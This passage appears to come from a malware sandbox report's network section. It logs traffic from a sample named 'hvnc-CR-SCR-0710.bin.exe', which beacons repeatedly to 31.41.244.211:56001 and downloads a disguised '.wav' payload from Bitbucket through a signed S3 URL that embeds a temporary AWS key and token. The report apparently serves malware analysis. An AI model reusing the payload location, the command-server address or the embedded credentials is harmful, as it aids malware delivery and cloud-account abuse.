Oct 13, 2024 18:17:17.874536991 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:17.879453897 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:17.879528046 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:17.884354115 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:27.363179922 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:27.368395090 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:27.368571043 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:27.373420954 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:27.776428938 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:27.831356049 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:27.950627089 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:27.953737974 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:27.958677053 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:27.958734035 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:27.963537931 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.019282103 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.025075912 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.027535915 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.032915115 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.432068110 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.487675905 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.606668949 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.608746052 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.613713026 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.613787889 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.618773937 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.628492117 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.634393930 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:35.635530949 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:35.640435934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:36.027642012 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:36.081358910 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:36.200606108 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:36.202721119 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:36.207607985 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:36.207664013 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:36.212527990 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:45.067826033 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:45.072932959 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:45.073039055 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:45.077912092 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:45.478842974 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:45.518987894 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:45.654094934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:45.657521963 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:45.861160040 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:45.861232996 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:46.091980934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:48.472435951 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:48.878532887 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:48.888576031 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:48.888614893 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:49.119600058 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:49.175107956 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:49.294317961 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:49.295875072 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:49.300869942 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:49.300966978 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:49.305761099 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:51.378520012 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:51.568155050 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:51.571572065 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:51.576802969 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:51.979819059 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:52.032634974 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:52.153928041 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:52.155869961 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:52.160973072 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:52.161026955 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:52.166016102 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:54.363162994 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:54.368482113 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:54.368550062 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:54.373481035 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:54.791526079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:54.831439972 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:54.966334105 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:54.967787027 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:54.972783089 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:54.972846985 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:54.977782965 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:00.269412041 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:00.468924046 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:00.469011068 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:00.473921061 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:00.870156050 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:00.909801006 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:01.044538975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:01.083534002 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:01.088525057 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:01.091634035 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:01.096502066 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:11.284836054 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:11.289839029 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:11.290102959 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:11.295110941 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:11.716000080 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:11.768909931 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:11.888741970 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:11.891248941 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:11.896271944 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:11.896397114 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:11.901505947 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:16.269484997 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:16.274899960 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:16.274965048 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:16.279846907 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:16.831559896 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:16.857259035 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:16.859607935 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:16.862740040 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:16.867636919 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:16.871615887 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:16.876512051 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:26.691195965 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:26.696527004 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:26.696582079 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:26.701410055 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:27.103569984 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:27.143918991 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:27.279603958 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:27.282318115 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:27.287298918 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:27.287384987 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:27.292208910 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.128803968 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.133810997 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.133939028 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.138799906 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.160022974 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.165066957 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.165127993 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.170064926 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.648205042 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.706440926 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.717087984 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.718914986 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.724562883 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:30.724617958 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:30.730714083 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:41.473752975 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:41.478888988 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:41.479578972 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:41.484384060 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:41.885822058 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:41.940819025 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:42.061358929 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:42.063183069 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:42.068382978 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:42.068444967 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:42.073525906 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:46.613189936 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:46.724342108 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:46.724406004 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:46.729379892 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:47.151509047 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:47.209589958 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:47.326425076 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:47.330137968 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:47.335166931 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:18:47.335289001 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:18:47.340159893 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:01.910012960 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:01.915724039 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:01.915781975 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:01.920614958 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:02.323050976 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:02.367719889 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:02.502819061 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:02.550235987 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:02.652344942 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:02.659060001 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:02.659122944 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:02.663917065 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:08.930591106 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:08.936129093 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:08.936206102 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:08.941184044 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:09.338048935 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:09.378468037 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:09.514504910 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:09.515424967 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:09.520739079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:19:09.520812035 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:19:09.525610924 CEST	56001	49732	31.41.244.211	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 18:14:59.555141926 CEST	61587	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:14:59.562783003 CEST	53	61587	1.1.1.1	192.168.2.4
Oct 13, 2024 18:15:00.801987886 CEST	59894	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:15:00.821638107 CEST	53	59894	1.1.1.1	192.168.2.4
Oct 13, 2024 18:15:14.746391058 CEST	65518	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:15:14.762813091 CEST	53	65518	1.1.1.1	192.168.2.4
Oct 13, 2024 18:15:21.862559080 CEST	55399	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:15:21.872925043 CEST	53	55399	1.1.1.1	192.168.2.4
Oct 13, 2024 18:15:43.979330063 CEST	53	55173	162.159.36.2	192.168.2.4
Oct 13, 2024 18:15:44.511641026 CEST	53	61129	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 18:14:59.555141926 CEST	192.168.2.4	1.1.1.1	0x2724	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.801987886 CEST	192.168.2.4	1.1.1.1	0x31f5	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.746391058 CEST	192.168.2.4	1.1.1.1	0x8d62	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.862559080 CEST	192.168.2.4	1.1.1.1	0x333a	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 18:14:59.562783003 CEST	1.1.1.1	192.168.2.4	0x2724	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:14:59.562783003 CEST	1.1.1.1	192.168.2.4	0x2724	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:14:59.562783003 CEST	1.1.1.1	192.168.2.4	0x2724	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.30.95	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.28.118	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.27.60	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.12.218	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.115.67	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.201.217	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.122.161	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:00.821638107 CEST	1.1.1.1	192.168.2.4	0x31f5	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.40.36	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.90.148	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.132.201	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		16.15.177.51	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.233.25	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.47.28	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.27.45	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.114.209	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:14.762813091 CEST	1.1.1.1	192.168.2.4	0x8d62	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.37.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.232.1	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.99.116	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.34.17	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.16.75	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.41.33	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		16.15.178.141	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.206.19	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:15:21.872925043 CEST	1.1.1.1	192.168.2.4	0x333a	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.112.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

bbuseruploads.s3.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.166.143.49	443	7164	C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 16:15:00 UTC	119	OUT	GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-10-13 16:15:00 UTC	5162	IN	HTTP/1.1 302 Found Date: Sun, 13 Oct 2024 16:15:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBD [TRUNCATED] Expires: Sun, 13 Oct 2024 16:15:00 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 49c338232ccc X-Version: 28f515bd4e87 X-Static-Version: 28f515bd4e87 X-Request-Count: 1505 X-Render-Time: 0.041725873947143555 X-B3-Traceid: 11c58463a3af4fd6ad3214a82871f9b3 X-B3-Spanid: eec09d44dc1ae468 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; object-src 'none'; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net [TRUNCATED] X-Usage-Quota-Remaining: 999219.142 X-Usage-Request-Cost: 793.20 X-Usage-User-Time: 0.022060 X-Usage-System-Time: 0.001736 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 11c58463a3af4fd6ad3214a82871f9b3 Atl-Request-Id: 11c58463-a3af-4fd6-ad32-14a82871f9b3 Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", 